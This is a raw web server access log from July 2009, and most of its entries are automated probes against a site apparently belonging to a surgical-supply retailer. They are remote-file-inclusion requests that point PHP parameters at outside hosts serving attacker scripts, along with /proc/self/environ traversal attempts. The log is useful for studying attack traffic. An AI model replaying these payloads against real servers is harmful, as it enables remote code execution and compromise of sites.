81.177.9.32 - - [17/Jul/2009:02:35:12 -0400] "GET /logs/access_log.Q109052600/?REX[INCLUDE_PATH]=http://www.thebalvenie.com//files/master-id.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
81.177.9.32 - - [17/Jul/2009:02:35:12 -0400] "GET /?REX[INCLUDE_PATH]=http://www.thebalvenie.com//files/master-id.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
81.177.9.32 - - [17/Jul/2009:02:35:12 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.thebalvenie.com//files/master-id.txt? HTTP/1.1" 200 9860 "-" "libwww-perl/5.805"
65.55.105.234 - - [17/Jul/2009:02:35:21 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.234 - - [17/Jul/2009:02:35:24 -0400] "GET /logs/access_log.Q109013000 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.234 - - [17/Jul/2009:02:35:24 -0400] "GET /logs/access_log.Q109030400 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
61.78.62.84 - - [17/Jul/2009:02:35:28 -0400] "GET //common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:35:29 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:35:29 -0400] "GET /logs//common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
81.177.9.32 - - [17/Jul/2009:02:35:31 -0400] "GET /logs/access_log.Q109053100/?REX[INCLUDE_PATH]=http://www.thebalvenie.com//files/master-id.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
61.78.62.84 - - [17/Jul/2009:02:35:32 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:35:32 -0400] "GET /logs//common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:35:32 -0400] "GET //common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:36:30 -0400] "GET /logs//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:36:30 -0400] "GET /logs/access_log.Q109053100%20%20//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:36:31 -0400] "GET //modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:36:31 -0400] "GET //modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:36:31 -0400] "GET /logs//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:36:31 -0400] "GET /logs/access_log.Q109053100%20%20//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:36:33 -0400] "GET /logs/access_log.Q109053100%20%20//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:36:33 -0400] "GET /logs//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:36:34 -0400] "GET //modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
85.72.116.39 - - [17/Jul/2009:02:36:38 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
206.225.23.4 - - [17/Jul/2009:02:37:22 -0400] "GET /logs/access_log.Q109070800%20%20//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:37:23 -0400] "GET /logs/access_log.Q109070800%20%20//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:37:24 -0400] "GET /logs/access_log.Q109070800%20%20//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:37:29 -0400] "GET /errors.php?error=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:37:30 -0400] "GET /logs/errors.php?error=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:37:31 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:37:34 -0400] "GET /logs/error_log.Q109070500//common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:37:36 -0400] "GET /logs/error_log.Q109070500//common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:37:50 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:37:50 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:37:50 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:37:57 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:02:38:37 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:02:38:37 -0400] "GET /logs/access_log.Q109052200%20%20//include/admin.lib.inc.php?site_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:38:37 -0400] "GET /logs/access_log.Q109051600/errors.php?error=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:02:38:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.153.6.44 - - [17/Jul/2009:02:39:08 -0400] "GET /logs/access_log.Q109062800/index.php?inhalt=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
85.153.6.44 - - [17/Jul/2009:02:39:08 -0400] "GET /logs/access_log.Q109062800/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
85.153.6.44 - - [17/Jul/2009:02:39:08 -0400] "GET /logs/access_log.Q109062800/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:39:09 -0400] "GET /logs/access_log.Q109062800/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
94.102.9.216 - - [17/Jul/2009:02:39:14 -0400] "GET /logs/access_log.Q109052100%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://piacere.altervista.org/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.153.6.44 - - [17/Jul/2009:02:39:25 -0400] "GET /logs/error_log.Q109062800/index.php?inhalt=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
85.153.6.44 - - [17/Jul/2009:02:39:25 -0400] "GET /logs/error_log.Q109062800/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
85.153.6.44 - - [17/Jul/2009:02:39:25 -0400] "GET /logs/error_log.Q109062800/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 233 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:39:25 -0400] "GET /logs/error_log.Q109062800/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "XXXXXX"
79.174.68.88 - - [17/Jul/2009:02:39:26 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:02:39:34 -0400] "GET /logs/access_log.Q109052200%20%20//include/admin.lib.inc.php?site_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:40:18 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:40:18 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:40:18 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:41:17 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:41:18 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
81.240.115.147 - - [17/Jul/2009:02:41:34 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.240.115.147 - - [17/Jul/2009:02:41:34 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.240.115.147 - - [17/Jul/2009:02:41:36 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.240.115.147 - - [17/Jul/2009:02:41:36 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.217.199.214 - - [17/Jul/2009:02:41:48 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:41:52 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.200.37.14 - - [17/Jul/2009:02:41:53 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
209.200.37.14 - - [17/Jul/2009:02:41:53 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
209.200.37.14 - - [17/Jul/2009:02:41:53 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
206.225.23.4 - - [17/Jul/2009:02:41:53 -0400] "GET /logs/access_log.Q109062100//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:41:53 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:41:54 -0400] "GET /logs/access_log.Q109062100//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
74.52.66.106 - - [17/Jul/2009:02:41:55 -0400] "GET /logs/access_log.Q109060500/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
74.52.66.106 - - [17/Jul/2009:02:41:55 -0400] "GET /errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
74.52.66.106 - - [17/Jul/2009:02:41:56 -0400] "GET /logs/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
209.200.37.14 - - [17/Jul/2009:02:42:01 -0400] "GET /logs/access_log.Q109070500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
85.153.6.44 - - [17/Jul/2009:02:42:32 -0400] "GET /logs/access_log.Q109062800//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 267 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.153.6.44 - - [17/Jul/2009:02:42:33 -0400] "GET /logs/access_log.Q109062800/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Avant Browser (http://www.avantbrowser.com)"
85.153.6.44 - - [17/Jul/2009:02:42:33 -0400] "GET /logs/access_log.Q109062800//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 267 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:42:33 -0400] "GET /logs/access_log.Q109062800//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 267 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:42:36 -0400] "GET /logs/error_log.Q109062800//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.153.6.44 - - [17/Jul/2009:02:42:37 -0400] "GET /logs/error_log.Q109062800/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Avant Browser (http://www.avantbrowser.com)"
85.153.6.44 - - [17/Jul/2009:02:42:37 -0400] "GET /logs/error_log.Q109062800//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 266 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:42:37 -0400] "GET /logs/error_log.Q109062800//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 266 "-" "XXXXXX"
206.225.23.4 - - [17/Jul/2009:02:42:40 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:42:41 -0400] "GET /logs/access_log.Q109062100//modules/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
212.112.224.125 - - [17/Jul/2009:02:43:29 -0400] "GET /logs/error_log.Q109070500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
212.112.224.125 - - [17/Jul/2009:02:43:29 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
212.112.224.125 - - [17/Jul/2009:02:43:30 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
212.112.224.125 - - [17/Jul/2009:02:43:31 -0400] "GET /logs/access_log.Q109070500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
209.59.12.99 - - [17/Jul/2009:02:43:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.217.199.214 - - [17/Jul/2009:02:43:42 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:43:48 -0400] "GET /logs/access_log.Q109052200%20%20//include/admin.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:45:03 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:45:19 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:45:29 -0400] "GET //main.php?sayfa=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:45:29 -0400] "GET /logs//main.php?sayfa=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:45:29 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:45:31 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.52.66.106 - - [17/Jul/2009:02:45:32 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
87.106.245.84 - - [17/Jul/2009:02:47:13 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:47:13 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.230.156.161 - - [17/Jul/2009:02:47:27 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
211.230.156.161 - - [17/Jul/2009:02:47:27 -0400] "GET /logs/access_log.Q109070500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
211.230.156.161 - - [17/Jul/2009:02:47:27 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
66.11.230.36 - - [17/Jul/2009:02:47:31 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:02:47:31 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:02:47:32 -0400] "GET /logs/access_log.Q109070300%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:02:47:39 -0400] "GET /logs/error_log.Q109070300%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
72.30.161.230 - - [17/Jul/2009:02:47:57 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.230 - - [17/Jul/2009:02:47:57 -0400] "GET /logs/error_log.Q109051100 HTTP/1.0" 200 4162834 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.230.156.161 - - [17/Jul/2009:02:48:02 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
66.11.230.36 - - [17/Jul/2009:02:48:39 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:02:48:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.161.230 - - [17/Jul/2009:02:47:58 -0400] "GET /logs/error_log.Q109051100 HTTP/1.0" 200 4162834 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.68.70 - - [17/Jul/2009:02:48:59 -0400] "GET /images/items/index15_cath_over.jpg HTTP/1.1" 200 1290 "-" "Googlebot-Image/1.0"
66.11.230.36 - - [17/Jul/2009:02:49:15 -0400] "GET /logs/error_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
123.143.98.5 - - [17/Jul/2009:02:49:41 -0400] "GET /logs/access_log.Q109051000//components/includes/com_zoom/zoom.html.php?mosConfig_absolute_path=http://kaya-organik.com/components/com_poll/models/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
123.143.98.5 - - [17/Jul/2009:02:49:41 -0400] "GET /logs//components/includes/com_zoom/zoom.html.php?mosConfig_absolute_path=http://kaya-organik.com/components/com_poll/models/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
123.143.98.5 - - [17/Jul/2009:02:49:41 -0400] "GET //components/includes/com_zoom/zoom.html.php?mosConfig_absolute_path=http://kaya-organik.com/components/com_poll/models/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
123.143.98.5 - - [17/Jul/2009:02:50:01 -0400] "GET /logs/access_log.Q109052700//components/includes/com_zoom/zoom.html.php?mosConfig_absolute_path=http://kaya-organik.com/components/com_poll/models/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
85.72.116.39 - - [17/Jul/2009:02:50:13 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
81.240.115.147 - - [17/Jul/2009:02:50:18 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):instant%20cold HTTP/1.1" 200 38022 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.240.115.147 - - [17/Jul/2009:02:50:20 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):instant cold" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.240.115.147 - - [17/Jul/2009:02:50:20 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):instant cold" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.240.115.147 - - [17/Jul/2009:02:50:20 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):instant cold" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.240.115.147 - - [17/Jul/2009:02:50:20 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):instant cold" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.240.115.147 - - [17/Jul/2009:02:50:20 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):instant cold" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.240.115.147 - - [17/Jul/2009:02:50:20 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):instant cold" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
